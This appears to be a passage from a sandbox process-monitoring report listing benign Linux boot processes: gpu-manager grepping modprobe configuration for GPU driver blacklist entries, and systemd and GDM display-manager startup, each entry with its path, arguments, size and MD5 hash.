                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:/usr/share/gdm/generate-config
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:18
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill --signal HUP --uid gdm dconf-service
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:11:20
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:20
                                Start date:11/11/2021
                                Path:/usr/lib/gdm3/gdm-wait-for-drm
                                Arguments:/usr/lib/gdm3/gdm-wait-for-drm
                                File size:14640 bytes
                                MD5 hash:82043ba752c6930b4e6aaea2f7747545

                                General

                                Start time:03:11:30
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:30
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:/usr/sbin/gdm3
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f